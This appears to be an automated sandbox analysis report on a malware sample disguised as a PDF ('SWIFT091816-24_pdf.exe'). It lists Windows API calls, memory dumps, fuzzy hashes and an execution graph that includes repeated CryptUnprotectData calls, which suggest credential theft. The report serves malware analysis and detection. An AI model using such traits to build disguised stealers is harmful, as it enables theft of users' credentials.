                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3585118688-0
                                                                                                                                • Opcode ID: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                                                • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                                                • Opcode Fuzzy Hash: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                                                • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                                                APIs
                                                                                                                                • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                                • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"), ref: 00405AC2
                                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                                • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"), ref: 00405B6A
                                                                                                                                • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 3248276644-3081826266
                                                                                                                                • Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                                • Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
                                                                                                                                • Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                                • Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD
                                                                                                                                APIs
                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                Strings
                                                                                                                                • Error launching installer, xrefs: 00405748
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                • String ID: Error launching installer
                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                                • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                                APIs
                                                                                                                                • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 0040382A
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403809
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 1100898210-3081826266
                                                                                                                                • Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                                                • Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
                                                                                                                                • Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                                                • Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SWIFT091816-24_pdf.exe,C:\Users\user\Desktop\SWIFT091816-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
                                                                                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SWIFT091816-24_pdf.exe,C:\Users\user\Desktop\SWIFT091816-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                • API String ID: 2709904686-224404859
                                                                                                                                • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                                • Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
                                                                                                                                • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                                • Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9
                                                                                                                                APIs
                                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 1000116A
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2471251623.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2471237821.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471265197.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471278641.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                APIs
                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                                • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 190613189-0
                                                                                                                                • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                                • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:10.1%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:2.4%
                                                                                                                                Total number of Nodes:254
                                                                                                                                Total number of Limit Nodes:14
                                                                                                                                execution_graph 37619 394ee60e 37622 394ee712 DispatchMessageW 37619->37622 37623 394ee616 37622->37623 37624 3600b168 37625 3600b174 37624->37625 37632 38410190 37625->37632 37636 38410198 37625->37636 37626 3600b1a3 37640 394e2729 37626->37640 37646 394e2730 37626->37646 37633 384101a4 37632->37633 37652 3841c638 37633->37652 37634 384101da 37634->37626 37637 384101a4 37636->37637 37639 3841c638 CryptUnprotectData 37637->37639 37638 384101da 37638->37626 37639->37638 37641 394e273f 37640->37641 37679 394e0938 37641->37679 37647 394e273f 37646->37647 37648 394e0938 10 API calls 37647->37648 37649 394e2746 37648->37649 37650 394e188c 13 API calls 37649->37650 37651 3600b1b1 37650->37651 37653 3841c66a 37652->37653 37654 3841caf9 37653->37654 37656 3841cf1d 37653->37656 37654->37634 37657 3841cf2c 37656->37657 37660 3841d577 37657->37660 37661 3841d59b 37660->37661 37666 3841d577 CryptUnprotectData 37661->37666 37668 3841d7a0 37661->37668 37672 3841d74b 37661->37672 37662 3841d629 37676 3841d1ec 37662->37676 37666->37662 37669 3841d7bd 37668->37669 37670 3841d1ec CryptUnprotectData 37669->37670 37671 3841d7f5 37670->37671 37671->37662 37673 3841d6db 37672->37673 37673->37672 37674 3841d1ec CryptUnprotectData 37673->37674 37675 3841d7f5 37674->37675 37675->37662 37677 3841d9e0 CryptUnprotectData 37676->37677 37678 3841cf80 37677->37678 37678->37653 37680 394e0948 37679->37680 37681 394e0965 37680->37681 37688 394e0978 37680->37688 37700 394e0980 37680->37700 37684 394e188c 37681->37684 37686 394e1897 37684->37686 37687 394e2866 37686->37687 37722 394e1934 37686->37722 37689 394e09c6 GetCurrentProcess 37688->37689 37691 394e0a18 GetCurrentThread 37689->37691 37692 394e0a11 37689->37692 37693 394e0a4e 37691->37693 37694 394e0a55 GetCurrentProcess 37691->37694 37692->37691 37693->37694 37696 394e0a8b 37694->37696 37695 394e0ab3 GetCurrentThreadId 37697 394e0ae4 37695->37697 37712 394e0f39 37696->37712 37714 394e0b57 37696->37714 37697->37681 37701 394e09c6 GetCurrentProcess 37700->37701 37703 394e0a18 GetCurrentThread 37701->37703 37704 394e0a11 37701->37704 37705 394e0a55 GetCurrentProcess 37703->37705 37707 394e0a4e 37703->37707 37704->37703 37706 394e0a8b 37705->37706 37710 394e0f39 37706->37710 37711 394e0b57 2 API calls 37706->37711 37707->37705 37708 394e0ab3 GetCurrentThreadId 37709 394e0ae4 37708->37709 37709->37681 37710->37708 37711->37708 37713 394e0f4e 37712->37713 37713->37695 37718 394e0bc8 DuplicateHandle 37714->37718 37720 394e0bc0 DuplicateHandle 37714->37720 37715 394e0b8e 37715->37695 37719 394e0c5e 37718->37719 37719->37715 37721 394e0c5e 37720->37721 37721->37715 37727 394e193f 37722->37727 37723 394e2e79 37724 394e2ea9 37723->37724 37725 394e2ac4 11 API calls 37723->37725 37729 394e2ed4 37724->37729 37743 394e2ac4 37724->37743 37725->37724 37727->37723 37727->37729 37733 394e3e32 37727->37733 37738 394e3e40 37727->37738 37728 394e2ec1 37728->37729 37749 394ed6c1 37728->37749 37729->37686 37735 394e3e61 37733->37735 37734 394e3e85 37734->37723 37735->37734 37755 394e3fe7 37735->37755 37761 394e3ff0 37735->37761 37740 394e3e61 37738->37740 37739 394e3e85 37739->37723 37740->37739 37741 394e3fe7 11 API calls 37740->37741 37742 394e3ff0 11 API calls 37740->37742 37741->37739 37742->37739 37745 394e2acf 37743->37745 37744 394ed0a1 37744->37728 37745->37744 37746 394e0938 10 API calls 37745->37746 37747 394ed0bb 37746->37747 37803 394ec544 37747->37803 37754 394ed6f1 37749->37754 37750 394ed899 37751 394e0938 10 API calls 37750->37751 37753 394ed77c 37751->37753 37752 394edad0 WaitMessage 37752->37754 37754->37750 37754->37752 37754->37753 37756 394e3ffd 37755->37756 37757 394e0938 10 API calls 37756->37757 37758 394e402b 37757->37758 37760 394e4036 37758->37760 37767 394e2bec 37758->37767 37760->37734 37764 394e3ffd 37761->37764 37762 394e0938 10 API calls 37763 394e402b 37762->37763 37765 394e4036 37763->37765 37766 394e2bec 11 API calls 37763->37766 37764->37762 37765->37734 37766->37765 37768 394e2bf7 37767->37768 37770 394e40a8 37768->37770 37771 394e2c20 37768->37771 37770->37770 37772 394e2c2b 37771->37772 37777 394e2c30 37772->37777 37774 394e4517 37781 394e9221 37774->37781 37778 394e2c3b 37777->37778 37779 394e57a0 37778->37779 37780 394e3e40 11 API calls 37778->37780 37779->37774 37780->37779 37782 394e4551 37781->37782 37783 394e9235 37781->37783 37782->37770 37787 38fbfaa1 37783->37787 37792 38fbfab0 37783->37792 37784 394e9321 37788 38fbfadb 37787->37788 37789 38fbfb8a 37788->37789 37797 394e00b7 37788->37797 37800 394e00c0 37788->37800 37793 38fbfadb 37792->37793 37794 38fbfb8a 37793->37794 37795 394e00b7 CreateWindowExW 37793->37795 37796 394e00c0 CreateWindowExW 37793->37796 37795->37794 37796->37794 37798 394e00f5 37797->37798 37799 394e01c8 CreateWindowExW 37797->37799 37798->37789 37799->37798 37802 394e01c8 CreateWindowExW 37800->37802 37801 394e00f5 37801->37789 37802->37801 37805 394ec54f 37803->37805 37804 394ed3bb 37804->37744 37805->37804 37807 394ec560 37805->37807 37808 394ed3f0 OleInitialize 37807->37808 37809 394ed454 37808->37809 37809->37804 37844 38fbce60 37845 38fbce7c 37844->37845 37848 38fb94b4 37845->37848 37847 38fbce9b 37849 38fb94bf 37848->37849 37850 38fbcf4f 37849->37850 37853 38fbcf59 37849->37853 37857 38fbcf68 37849->37857 37850->37847 37854 38fbcf67 37853->37854 37855 38fbd021 37854->37855 37856 38fb95e8 CreateWindowExW 37854->37856 37856->37855 37858 38fbcf69 37857->37858 37859 38fb95e8 CreateWindowExW 37858->37859 37860 38fbd021 37858->37860 37859->37860 37810 394e2020 SetTimer 37811 394e208c 37810->37811 37812 394e20c0 37813 394e20ed 37812->37813 37814 394e213c 37813->37814 37816 394e17fc 37813->37816 37814->37814 37817 394e1807 37816->37817 37818 394e229c 37817->37818 37831 394e17d0 37817->37831 37823 38fb95e8 37818->37823 37827 38fbec22 37818->37827 37820 394e22a5 37820->37814 37824 38fb95f3 37823->37824 37826 38fbec47 37824->37826 37835 38fbe7f4 37824->37835 37826->37820 37828 38fbec3a 37827->37828 37830 38fbec47 37827->37830 37829 38fbe7f4 CreateWindowExW 37828->37829 37828->37830 37829->37830 37830->37820 37832 394e17db 37831->37832 37840 394e181c 37832->37840 37834 394e22f5 37834->37818 37837 38fbe7ff 37835->37837 37836 38fbf111 37836->37826 37837->37836 37838 38fbfaa1 CreateWindowExW 37837->37838 37839 38fbfab0 CreateWindowExW 37837->37839 37838->37836 37839->37836 37841 394e1827 37840->37841 37842 394e2461 GetCurrentThreadId 37841->37842 37843 394e248b 37841->37843 37842->37843 37843->37834 37861 35efd030 37862 35efd048 37861->37862 37863 35efd0a2 37862->37863 37868 394e02c8 37862->37868 37873 394e02c0 37862->37873 37878 394e1bd0 37862->37878 37885 394e1bc0 37862->37885 37869 394e02ee 37868->37869 37871 394e1bc0 3 API calls 37869->37871 37872 394e1bd0 3 API calls 37869->37872 37870 394e030f 37870->37863 37871->37870 37872->37870 37874 394e02ee 37873->37874 37876 394e1bc0 3 API calls 37874->37876 37877 394e1bd0 3 API calls 37874->37877 37875 394e030f 37875->37863 37876->37875 37877->37875 37879 394e1bfd 37878->37879 37880 394e1c2f 37879->37880 37892 394e1d58 37879->37892 37902 394e9b40 37879->37902 37907 394e1d50 37879->37907 37917 394e9b48 37879->37917 37886 394e1bfd 37885->37886 37887 394e1c2f 37886->37887 37888 394e1d58 3 API calls 37886->37888 37889 394e9b48 2 API calls 37886->37889 37890 394e1d50 3 API calls 37886->37890 37891 394e9b40 2 API calls 37886->37891 37888->37887 37889->37887 37890->37887 37891->37887 37893 394e1d66 37892->37893 37894 394e1d93 37892->37894 37895 394e1d6e 37893->37895 37922 394e1dc0 37893->37922 37926 394e1db9 37893->37926 37894->37893 37896 394e1d98 37894->37896 37895->37880 37897 394e17d0 GetCurrentThreadId 37896->37897 37899 394e1da4 37897->37899 37898 394e1dac 37898->37880 37899->37880 37904 394e9b5c 37902->37904 37903 394e9be8 37903->37880 37930 394e9bf7 37904->37930 37933 394e9c00 37904->37933 37908 394e1d66 37907->37908 37909 394e1d93 37907->37909 37914 394e1d6e 37908->37914 37915 394e1db9 CallWindowProcW 37908->37915 37916 394e1dc0 CallWindowProcW 37908->37916 37909->37908 37910 394e1d98 37909->37910 37911 394e17d0 GetCurrentThreadId 37910->37911 37913 394e1da4 37911->37913 37912 394e1dac 37912->37880 37913->37880 37914->37880 37915->37912 37916->37912 37919 394e9b5c 37917->37919 37918 394e9be8 37918->37880 37920 394e9bf7 2 API calls 37919->37920 37921 394e9c00 2 API calls 37919->37921 37920->37918 37921->37918 37923 394e1e02 37922->37923 37925 394e1e09 37922->37925 37924 394e1e5a CallWindowProcW 37923->37924 37923->37925 37924->37925 37925->37898 37927 394e1e02 37926->37927 37929 394e1e09 37926->37929 37928 394e1e5a CallWindowProcW 37927->37928 37927->37929 37928->37929 37929->37898 37931 394e9c11 37930->37931 37936 394eb047 37930->37936 37931->37903 37934 394e9c11 37933->37934 37935 394eb047 2 API calls 37933->37935 37934->37903 37935->37934 37938 394e1db9 CallWindowProcW 37936->37938 37939 394e1dc0 CallWindowProcW 37936->37939 37937 394eb05a 37937->37931 37938->37937 37939->37937

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
